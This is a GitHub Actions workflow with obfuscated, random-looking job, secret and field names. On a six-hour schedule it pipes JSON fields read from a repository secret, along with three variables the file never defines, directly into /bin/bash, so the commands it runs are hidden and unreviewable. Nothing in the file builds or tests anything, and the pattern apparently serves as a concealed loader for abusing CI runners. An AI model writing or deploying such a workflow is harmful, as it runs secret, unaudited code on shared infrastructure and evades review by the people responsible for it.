name: jiatingqian7584
on:
  workflow_dispatch:
  schedule:
    - cron: '41 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiatingqian7584
        env:
          roswl8: ${{ secrets.roswl8 }}
        run: |
          echo $roswl8 | jq -r .lv19739 | /bin/bash
          echo $irdlq444 | jq -r .uaivr60 | /bin/bash
          echo $pi8500 | jq -r .haf8873 | /bin/bash
          echo $xuj12687 | jq -r .q42051 | /bin/bash

